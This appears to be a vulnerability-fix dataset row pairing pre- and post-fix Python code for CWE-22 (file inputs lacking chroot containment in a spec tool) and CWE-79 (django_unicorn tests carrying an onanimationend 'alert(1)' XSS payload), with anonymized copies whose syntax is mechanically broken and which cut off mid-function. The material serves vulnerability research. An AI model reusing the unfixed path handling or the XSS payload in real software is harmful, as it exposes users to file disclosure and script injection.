57,
61,
63,
73,
77,
81,
85,
89,
94,
98,
100,
101,
102,
105,
109,
111,
112,
117,
121,
125,
129,
133,
137,
141,
148,
154,
160,
164,
168,
172,
176,
178,
181,
182,
186,
188,
194,
195,
204,
210,
211,
213,
217,
218,
219,
224,
228,
230,
232,
235,
238,
241,
242,
244,
248,
249,
250,
254,
258,
259,
261,
274,
287,
299,
312,
313,
315,
319,
326,
331,
336,
341,
343,
348
] |
0CWE-22
| from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import datetime
from typing import List, Optional
import attr
import requests
import tenacity
from .Line import Line
@attr.s(auto_attribs=True)
class InputContent:
rawLines: List[str]
date: Optional[datetime.date]
@property
def lines(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def content(self) -> str:
return "".join(self.rawLines)
class InputSource:
"""Represents a thing that can produce specification input text.
Input can be read from stdin ("-"), an HTTPS URL, or a file. Other
InputSources can be found relative to URLs and files, and there's a context
manager for temporarily switching to the directory of a file InputSource.
"""
def __new__(cls, sourceName: str):
"""Dispatches to the right subclass."""
if cls != InputSource:
# Only take control of calls to InputSource(...) itself.
return super().__new__(cls)
if sourceName == "-":
return StdinInputSource(sourceName)
if sourceName.startswith("https:"):
return UrlInputSource(sourceName)
return FileInputSource(sourceName)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
@abstractmethod
def read(self) -> InputContent:
"""Fully reads the source."""
def hasDirectory(self) -> bool:
"""Only some InputSources have a directory."""
return False
def directory(self) -> str:
"""Suitable for passing to subprocess(cwd=)."""
raise TypeError("{} instances don't have directories.".format(type(self)))
def relative(self, _) -> Optional[InputSource]:
"""Resolves relativePath relative to this InputSource.
For example, InputSource("/foo/bar/baz.txt").relative("quux/fuzzy.txt")
will be InputSource("/foo/bar/quux/fuzzy.txt").
If this source type can't find others relative to itself, returns None.
"""
return None
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this source, if that's known."""
return None
def cheaplyExists(self, _) -> Optional[bool]:
"""If it's cheap to determine, returns whether relativePath exists.
Otherwise, returns None.
"""
return None
def __getattr__(self, name):
"""Hack to make pylint happy, since all the attrs are defined
on the subclasses that __new__ dynamically dispatches to.
See https://stackoverflow.com/a/60731663/455535
"""
print(f"No member '{name}' contained in InputSource.")
return ""
class StdinInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName == "-"
self.type = "stdin"
self.sourceName = sourceName
self.content = None
def __str__(self) -> str:
return "-"
def read(self) -> InputContent:
return InputContent(sys.stdin.readlines(), None)
class UrlInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName.startswith("https:")
self.sourceName = sourceName
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def _fetch(self):
response = requests.get(self.sourceName, timeout=10)
if response.status_code == 404:
# This matches the OSErrors expected by older uses of
# FileInputSource. It skips the retry, since the server has given us
# a concrete, expected answer.
raise FileNotFoundError(errno.ENOENT, response.text, self.sourceName)
response.raise_for_status()
return response
def read(self) -> InputContent:
response = self._fetch()
date = None
if "Date" in response.headers:
# Use the response's Date header, although servers don't always set
# this according to the last change to the file.
date = email.utils.parsedate_to_datetime(response.headers["Date"]).date()
return InputContent(response.text.splitlines(True), date)
def relative(self, relativePath) -> UrlInputSource:
return UrlInputSource(urllib.parse.urljoin(self.sourceName, relativePath))
class FileInputSource(InputSource):
def __init__(self, sourceName: str):
self.sourceName = sourceName
self.type = "file"
self.content = None
def __str__(self) -> str:
return self.sourceName
def read(self) -> InputContent:
with open(self.sourceName, encoding="utf-8") as f:
return InputContent(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def hasDirectory(self) -> bool:
return True
def directory(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def relative(self, relativePath) -> FileInputSource:
return FileInputSource(os.path.join(self.directory(), relativePath))
def cheaplyExists(self, relativePath) -> bool:
return os.access(self.relative(relativePath).sourceName, os.R_OK)
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this file, or None if it doesn't exist."""
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import datetime
from typing import List, Optional
import attr
import requests
import tenacity
from . import config
from .Line import Line
@attr.s(auto_attribs=True)
class InputContent:
rawLines: List[str]
date: Optional[datetime.date]
@property
def lines(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def content(self) -> str:
return "".join(self.rawLines)
class InputSource:
"""Represents a thing that can produce specification input text.
Input can be read from stdin ("-"), an HTTPS URL, or a file. Other
InputSources can be found relative to URLs and files, and there's a context
manager for temporarily switching to the directory of a file InputSource.
"""
def __new__(cls, sourceName: str, **kwargs):
"""Dispatches to the right subclass."""
if cls != InputSource:
# Only take control of calls to InputSource(...) itself.
return super().__new__(cls)
if sourceName == "-":
return StdinInputSource(sourceName, **kwargs)
if sourceName.startswith("https:"):
return UrlInputSource(sourceName, **kwargs)
return FileInputSource(sourceName, **kwargs)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
@abstractmethod
def read(self) -> InputContent:
"""Fully reads the source."""
def hasDirectory(self) -> bool:
"""Only some InputSources have a directory."""
return False
def directory(self) -> str:
"""Suitable for passing to subprocess(cwd=)."""
raise TypeError("{} instances don't have directories.".format(type(self)))
def relative(self, _) -> Optional[InputSource]:
"""Resolves relativePath relative to this InputSource.
For example, InputSource("/foo/bar/baz.txt").relative("quux/fuzzy.txt")
will be InputSource("/foo/bar/quux/fuzzy.txt").
If this source type can't find others relative to itself, returns None.
"""
return None
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this source, if that's known."""
return None
def cheaplyExists(self, _) -> Optional[bool]:
"""If it's cheap to determine, returns whether relativePath exists.
Otherwise, returns None.
"""
return None
def __getattr__(self, name):
"""Hack to make pylint happy, since all the attrs are defined
on the subclasses that __new__ dynamically dispatches to.
See https://stackoverflow.com/a/60731663/455535
"""
print(f"No member '{name}' contained in InputSource.")
return ""
class StdinInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName == "-"
self.type = "stdin"
self.sourceName = sourceName
self.content = None
def __str__(self) -> str:
return "-"
def read(self) -> InputContent:
return InputContent(sys.stdin.readlines(), None)
class UrlInputSource(InputSource):
def __init__(self, sourceName: str):
assert sourceName.startswith("https:")
self.sourceName = sourceName
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def _fetch(self):
response = requests.get(self.sourceName, timeout=10)
if response.status_code == 404:
# This matches the OSErrors expected by older uses of
# FileInputSource. It skips the retry, since the server has given us
# a concrete, expected answer.
raise FileNotFoundError(errno.ENOENT, response.text, self.sourceName)
response.raise_for_status()
return response
def read(self) -> InputContent:
response = self._fetch()
date = None
if "Date" in response.headers:
# Use the response's Date header, although servers don't always set
# this according to the last change to the file.
date = email.utils.parsedate_to_datetime(response.headers["Date"]).date()
return InputContent(response.text.splitlines(True), date)
def relative(self, relativePath) -> UrlInputSource:
return UrlInputSource(urllib.parse.urljoin(self.sourceName, relativePath))
class FileInputSource(InputSource):
def __init__(self, sourceName: str, *, chroot: bool, chrootPath: Optional[str] = None):
self.sourceName = sourceName
self.chrootPath = chrootPath
self.type = "file"
self.content = None
if chroot and self.chrootPath is None:
self.chrootPath = self.directory()
if self.chrootPath is not None:
self.sourceName = config.chrootPath(self.chrootPath, self.sourceName)
def __str__(self) -> str:
return self.sourceName
def read(self) -> InputContent:
with open(self.sourceName, encoding="utf-8") as f:
return InputContent(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def hasDirectory(self) -> bool:
return True
def directory(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def relative(self, relativePath) -> FileInputSource:
return FileInputSource(os.path.join(self.directory(), relativePath), chroot=False, chrootPath=self.chrootPath)
def cheaplyExists(self, relativePath) -> bool:
return os.access(self.relative(relativePath).sourceName, os.R_OK)
def mtime(self) -> Optional[float]:
"""Returns the last modification time of this file, or None if it doesn't exist."""
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| path_disclosure | {
"code": [
" def __new__(cls, sourceName: str):",
" return StdinInputSource(sourceName)",
" return UrlInputSource(sourceName)",
" return FileInputSource(sourceName)",
" def __init__(self, sourceName: str):",
" return FileInputSource(os.path.join(self.directory(), relativePath))"
],
"line_no": [
41,
48,
50,
51,
160,
182
]
} | {
"code": [
"from . import config",
" return StdinInputSource(sourceName, **kwargs)",
" return UrlInputSource(sourceName, **kwargs)",
" def __init__(self, sourceName: str, *, chroot: bool, chrootPath: Optional[str] = None):",
" self.chrootPath = chrootPath",
" self.chrootPath = self.directory()",
" if self.chrootPath is not None:",
" self.sourceName = config.chrootPath(self.chrootPath, self.sourceName)",
" return FileInputSource(os.path.join(self.directory(), relativePath), chroot=False, chrootPath=self.chrootPath)"
],
"line_no": [
16,
49,
51,
161,
163,
168,
169,
170,
189
]
} | from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import .datetime
from typing import List, Optional
import attr
import requests
import tenacity
from .Line import Line
@attr.s(auto_attribs=True)
class CLASS_0:
rawLines: List[str]
VAR_7: Optional[datetime.date]
@property
def FUNC_0(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def FUNC_1(self) -> str:
return "".join(self.rawLines)
class CLASS_1:
def __new__(VAR_0, VAR_1: str):
if VAR_0 != CLASS_1:
return super().__new__(VAR_0)
if VAR_1 == "-":
return CLASS_2(VAR_1)
if VAR_1.startswith("https:"):
return CLASS_3(VAR_1)
return CLASS_4(VAR_1)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, VAR_2):
return str(self) == str(VAR_2)
@abstractmethod
def FUNC_2(self) -> CLASS_0:
def FUNC_3(self) -> bool:
return False
def FUNC_4(self) -> str:
raise TypeError("{} instances don't have directories.".format(type(self)))
def FUNC_5(self, VAR_3) -> Optional[CLASS_1]:
return None
def FUNC_6(self) -> Optional[float]:
return None
def FUNC_7(self, VAR_3) -> Optional[bool]:
return None
def __getattr__(self, VAR_4):
print(f"No member '{VAR_4}' contained in CLASS_1.")
return ""
class CLASS_2(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1 == "-"
self.type = "stdin"
self.sourceName = VAR_1
self.content = None
def __str__(self) -> str:
return "-"
def FUNC_2(self) -> CLASS_0:
return CLASS_0(sys.stdin.readlines(), None)
class CLASS_3(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1.startswith("https:")
self.sourceName = VAR_1
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def FUNC_8(self):
VAR_6 = requests.get(self.sourceName, timeout=10)
if VAR_6.status_code == 404:
raise FileNotFoundError(errno.ENOENT, VAR_6.text, self.sourceName)
VAR_6.raise_for_status()
return VAR_6
def FUNC_2(self) -> CLASS_0:
VAR_6 = self._fetch()
VAR_7 = None
if "Date" in VAR_6.headers:
VAR_7 = email.utils.parsedate_to_datetime(VAR_6.headers["Date"]).date()
return CLASS_0(VAR_6.text.splitlines(True), VAR_7)
def FUNC_5(self, VAR_5) -> CLASS_3:
return CLASS_3(urllib.parse.urljoin(self.sourceName, VAR_5))
class CLASS_4(CLASS_1):
def __init__(self, VAR_1: str):
self.sourceName = VAR_1
self.type = "file"
self.content = None
def __str__(self) -> str:
return self.sourceName
def FUNC_2(self) -> CLASS_0:
with open(self.sourceName, encoding="utf-8") as f:
return CLASS_0(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def FUNC_3(self) -> bool:
return True
def FUNC_4(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def FUNC_5(self, VAR_5) -> CLASS_4:
return CLASS_4(os.path.join(self.directory(), VAR_5))
def FUNC_7(self, VAR_5) -> bool:
return os.access(self.relative(VAR_5).sourceName, os.R_OK)
def FUNC_6(self) -> Optional[float]:
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| from __future__ import annotations
import email.utils
import errno
import os
import sys
import urllib.parse
from abc import abstractmethod
from datetime import .datetime
from typing import List, Optional
import attr
import requests
import tenacity
from . import config
from .Line import Line
@attr.s(auto_attribs=True)
class CLASS_0:
rawLines: List[str]
VAR_10: Optional[datetime.date]
@property
def FUNC_0(self) -> List[Line]:
return [Line(i, line) for i, line in enumerate(self.rawLines, 1)]
@property
def FUNC_1(self) -> str:
return "".join(self.rawLines)
class CLASS_1:
def __new__(VAR_0, VAR_1: str, **VAR_2):
if VAR_0 != CLASS_1:
return super().__new__(VAR_0)
if VAR_1 == "-":
return CLASS_2(VAR_1, **VAR_2)
if VAR_1.startswith("https:"):
return CLASS_3(VAR_1, **VAR_2)
return CLASS_4(VAR_1, **VAR_2)
@abstractmethod
def __str__(self) -> str:
pass
def __repr__(self) -> str:
return "{}({!r})".format(self.__class__.__name__, str(self))
def __hash__(self):
return hash(str(self))
def __eq__(self, VAR_3):
return str(self) == str(VAR_3)
@abstractmethod
def FUNC_2(self) -> CLASS_0:
def FUNC_3(self) -> bool:
return False
def FUNC_4(self) -> str:
raise TypeError("{} instances don't have directories.".format(type(self)))
def FUNC_5(self, VAR_4) -> Optional[CLASS_1]:
return None
def FUNC_6(self) -> Optional[float]:
return None
def FUNC_7(self, VAR_4) -> Optional[bool]:
return None
def __getattr__(self, VAR_5):
print(f"No member '{VAR_5}' contained in CLASS_1.")
return ""
class CLASS_2(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1 == "-"
self.type = "stdin"
self.sourceName = VAR_1
self.content = None
def __str__(self) -> str:
return "-"
def FUNC_2(self) -> CLASS_0:
return CLASS_0(sys.stdin.readlines(), None)
class CLASS_3(CLASS_1):
def __init__(self, VAR_1: str):
assert VAR_1.startswith("https:")
self.sourceName = VAR_1
self.type = "url"
def __str__(self) -> str:
return self.sourceName
@tenacity.retry(
reraise=True,
stop=tenacity.stop_after_attempt(3),
wait=tenacity.wait_random(1, 2),
)
def FUNC_8(self):
VAR_9 = requests.get(self.sourceName, timeout=10)
if VAR_9.status_code == 404:
raise FileNotFoundError(errno.ENOENT, VAR_9.text, self.sourceName)
VAR_9.raise_for_status()
return VAR_9
def FUNC_2(self) -> CLASS_0:
VAR_9 = self._fetch()
VAR_10 = None
if "Date" in VAR_9.headers:
VAR_10 = email.utils.parsedate_to_datetime(VAR_9.headers["Date"]).date()
return CLASS_0(VAR_9.text.splitlines(True), VAR_10)
def FUNC_5(self, VAR_6) -> CLASS_3:
return CLASS_3(urllib.parse.urljoin(self.sourceName, VAR_6))
class CLASS_4(CLASS_1):
def __init__(self, VAR_1: str, *, VAR_7: bool, VAR_8: Optional[str] = None):
self.sourceName = VAR_1
self.chrootPath = VAR_8
self.type = "file"
self.content = None
if VAR_7 and self.chrootPath is None:
self.chrootPath = self.directory()
if self.chrootPath is not None:
self.sourceName = config.chrootPath(self.chrootPath, self.sourceName)
def __str__(self) -> str:
return self.sourceName
def FUNC_2(self) -> CLASS_0:
with open(self.sourceName, encoding="utf-8") as f:
return CLASS_0(
f.readlines(),
datetime.fromtimestamp(os.path.getmtime(self.sourceName)).date(),
)
def FUNC_3(self) -> bool:
return True
def FUNC_4(self) -> str:
return os.path.dirname(os.path.abspath(self.sourceName))
def FUNC_5(self, VAR_6) -> CLASS_4:
return CLASS_4(os.path.join(self.directory(), VAR_6), VAR_7=False, VAR_8=self.chrootPath)
def FUNC_7(self, VAR_6) -> bool:
return os.access(self.relative(VAR_6).sourceName, os.R_OK)
def FUNC_6(self) -> Optional[float]:
try:
return os.stat(self.sourceName).st_mtime
except FileNotFoundError:
return None
| [
2,
11,
15,
17,
18,
23,
27,
31,
32,
35,
40,
44,
46,
52,
56,
59,
62,
65,
69,
73,
77,
80,
83,
87,
91,
94,
98,
106,
107,
114,
117,
120,
121,
127,
130,
139,
140,
141,
145,
150,
151,
154,
157,
158,
164,
167,
174,
177,
180,
183,
186,
193,
34,
35,
36,
37,
38,
39,
42,
68,
71,
75,
79,
80,
81,
82,
83,
84,
85,
89,
93,
94,
95,
96,
100,
101,
102,
103,
188
] | [
2,
11,
15,
18,
19,
24,
28,
32,
33,
36,
41,
45,
47,
53,
57,
60,
63,
66,
70,
74,
78,
81,
84,
88,
92,
95,
99,
107,
108,
115,
118,
121,
122,
128,
131,
140,
141,
142,
146,
151,
152,
155,
158,
159,
166,
171,
174,
181,
184,
187,
190,
193,
200,
35,
36,
37,
38,
39,
40,
43,
69,
72,
76,
80,
81,
82,
83,
84,
85,
86,
90,
94,
95,
96,
97,
101,
102,
103,
104,
195
] |
1CWE-79
| import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class ExampleComponent(UnicornView):
name = "World"
def get_name(self):
return "World"
@pytest.fixture()
def component():
return ExampleComponent(component_id="asdf1234", component_name="example")
def test_init_with_template_name():
class TestComponent(UnicornView):
template_name = "unicorn/test.html"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name == "unicorn/test.html"
def test_init_with_get_template_names():
class TestComponent(UnicornView):
def get_template_names(self):
return []
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name is None
def test_init_attribute_names_cache(component):
attribute_names_cache = component._attribute_names_cache
assert len(attribute_names_cache) == 1
assert attribute_names_cache[0] == "name"
def test_init_attribute_names(component):
attribute_names = component._attribute_names()
assert len(attribute_names) == 1
assert attribute_names[0] == "name"
def test_init_attributes(component):
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_properties():
class TestComponent(UnicornView):
@property
def name(self):
return "World"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_methods_cache(component):
assert len(component._methods_cache) == 1
def test_init_methods(component):
methods = component._methods()
assert len(methods) == 1
assert methods["get_name"]() == "World"
def test_get_frontend_context_variables(component):
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert frontend_context_variables_dict.get("name") == "World"
def test_get_frontend_context_variables_xss(component):
# Set component.name to a potential XSS attack
component.name = '<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>'
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert (
frontend_context_variables_dict.get("name")
== "<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>"
)
def test_get_frontend_context_variables_safe(component):
# Set component.name to a potential XSS attack
component.name = '<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>'
class Meta:
safe = [
"name",
]
setattr(component, "Meta", Meta())
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert (
frontend_context_variables_dict.get("name")
== '<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>'
)
def test_get_context_data(component):
context_data = component.get_context_data()
assert (
len(context_data) == 4
) # `unicorn` and `view` are added to context data by default
assert context_data.get("name") == "World"
assert isinstance(context_data.get("get_name"), types.MethodType)
def test_is_public(component):
assert component._is_public("test_name")
def test_is_public_protected(component):
assert component._is_public("_test_name") == False
def test_is_public_http_method_names(component):
assert component._is_public("http_method_names") == False
def test_meta_javascript_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
javascript_exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" in component.get_context_data()
def test_meta_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" not in component.get_context_data()
| import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class ExampleComponent(UnicornView):
name = "World"
def get_name(self):
return "World"
@pytest.fixture()
def component():
return ExampleComponent(component_id="asdf1234", component_name="example")
def test_init_with_template_name():
class TestComponent(UnicornView):
template_name = "unicorn/test.html"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name == "unicorn/test.html"
def test_init_with_get_template_names():
class TestComponent(UnicornView):
def get_template_names(self):
return []
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name is None
def test_init_attribute_names_cache(component):
attribute_names_cache = component._attribute_names_cache
assert len(attribute_names_cache) == 1
assert attribute_names_cache[0] == "name"
def test_init_attribute_names(component):
attribute_names = component._attribute_names()
assert len(attribute_names) == 1
assert attribute_names[0] == "name"
def test_init_attributes(component):
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_properties():
class TestComponent(UnicornView):
@property
def name(self):
return "World"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_methods_cache(component):
assert len(component._methods_cache) == 1
def test_init_methods(component):
methods = component._methods()
assert len(methods) == 1
assert methods["get_name"]() == "World"
def test_get_frontend_context_variables(component):
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert frontend_context_variables_dict.get("name") == "World"
def test_get_context_data(component):
context_data = component.get_context_data()
assert (
len(context_data) == 4
) # `unicorn` and `view` are added to context data by default
assert context_data.get("name") == "World"
assert isinstance(context_data.get("get_name"), types.MethodType)
def test_is_public(component):
assert component._is_public("test_name")
def test_is_public_protected(component):
assert component._is_public("_test_name") == False
def test_is_public_http_method_names(component):
assert component._is_public("http_method_names") == False
def test_meta_javascript_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
javascript_exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" in component.get_context_data()
def test_meta_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" not in component.get_context_data()
| xss | {
"code": [
"def test_get_frontend_context_variables_xss(component):",
" component.name = '<a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>'",
" frontend_context_variables = component.get_frontend_context_variables()",
" frontend_context_variables_dict = orjson.loads(frontend_context_variables)",
" assert len(frontend_context_variables_dict) == 1",
" assert (",
" frontend_context_variables_dict.get(\"name\")",
" == \"<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>\"",
" )",
"def test_get_frontend_context_variables_safe(component):",
" component.name = '<a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>'",
" class Meta:",
" safe = [",
" \"name\",",
" ]",
" setattr(component, \"Meta\", Meta())",
" frontend_context_variables = component.get_frontend_context_variables()",
" frontend_context_variables_dict = orjson.loads(frontend_context_variables)",
" assert len(frontend_context_variables_dict) == 1",
" assert (",
" frontend_context_variables_dict.get(\"name\")",
" == '<a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>'",
" )"
],
"line_no": [
85,
87,
89,
90,
91,
92,
93,
94,
95,
98,
100,
102,
103,
104,
105,
107,
109,
110,
111,
112,
113,
114,
115
]
} | {
"code": [],
"line_no": []
} | import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class CLASS_0(UnicornView):
VAR_1 = "World"
def FUNC_18(self):
return "World"
@pytest.fixture()
def VAR_0():
return CLASS_0(component_id="asdf1234", component_name="example")
def FUNC_1():
class CLASS_1(UnicornView):
VAR_9 = "unicorn/test.html"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name == "unicorn/test.html"
def FUNC_2():
class CLASS_1(UnicornView):
def FUNC_19(self):
return []
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name is None
def FUNC_3(VAR_0):
VAR_2 = VAR_0._attribute_names_cache
assert len(VAR_2) == 1
assert VAR_2[0] == "name"
def FUNC_4(VAR_0):
VAR_3 = VAR_0._attribute_names()
assert len(VAR_3) == 1
assert VAR_3[0] == "name"
def FUNC_5(VAR_0):
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_6():
class CLASS_1(UnicornView):
@property
def VAR_1(self):
return "World"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_7(VAR_0):
assert len(VAR_0._methods_cache) == 1
def FUNC_8(VAR_0):
VAR_5 = VAR_0._methods()
assert len(VAR_5) == 1
assert VAR_5["get_name"]() == "World"
def FUNC_9(VAR_0):
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert VAR_7.get("name") == "World"
def FUNC_10(VAR_0):
VAR_0.name = '<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>'
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert (
VAR_7.get("name")
== "<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>"
)
def FUNC_11(VAR_0):
VAR_0.name = '<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>'
class CLASS_2:
VAR_10 = [
"name",
]
setattr(VAR_0, "Meta", CLASS_2())
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert (
VAR_7.get("name")
== '<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>'
)
def FUNC_12(VAR_0):
VAR_8 = VAR_0.get_context_data()
assert (
len(VAR_8) == 4
) # `unicorn` and `view` are added to context data by default
assert VAR_8.get("name") == "World"
assert isinstance(VAR_8.get("get_name"), types.MethodType)
def FUNC_13(VAR_0):
assert VAR_0._is_public("test_name")
def FUNC_14(VAR_0):
assert VAR_0._is_public("_test_name") == False
def FUNC_15(VAR_0):
assert VAR_0._is_public("http_method_names") == False
def FUNC_16():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_11 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" in VAR_0.get_context_data()
def FUNC_17():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_12 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" not in VAR_0.get_context_data()
| import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class CLASS_0(UnicornView):
VAR_1 = "World"
def FUNC_16(self):
return "World"
@pytest.fixture()
def VAR_0():
return CLASS_0(component_id="asdf1234", component_name="example")
def FUNC_1():
class CLASS_1(UnicornView):
VAR_9 = "unicorn/test.html"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name == "unicorn/test.html"
def FUNC_2():
class CLASS_1(UnicornView):
def FUNC_17(self):
return []
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name is None
def FUNC_3(VAR_0):
VAR_2 = VAR_0._attribute_names_cache
assert len(VAR_2) == 1
assert VAR_2[0] == "name"
def FUNC_4(VAR_0):
VAR_3 = VAR_0._attribute_names()
assert len(VAR_3) == 1
assert VAR_3[0] == "name"
def FUNC_5(VAR_0):
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_6():
class CLASS_1(UnicornView):
@property
def VAR_1(self):
return "World"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_7(VAR_0):
assert len(VAR_0._methods_cache) == 1
def FUNC_8(VAR_0):
VAR_5 = VAR_0._methods()
assert len(VAR_5) == 1
assert VAR_5["get_name"]() == "World"
def FUNC_9(VAR_0):
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert VAR_7.get("name") == "World"
def FUNC_10(VAR_0):
VAR_8 = VAR_0.get_context_data()
assert (
len(VAR_8) == 4
) # `unicorn` and `view` are added to context data by default
assert VAR_8.get("name") == "World"
assert isinstance(VAR_8.get("get_name"), types.MethodType)
def FUNC_11(VAR_0):
assert VAR_0._is_public("test_name")
def FUNC_12(VAR_0):
assert VAR_0._is_public("_test_name") == False
def FUNC_13(VAR_0):
assert VAR_0._is_public("http_method_names") == False
def FUNC_14():
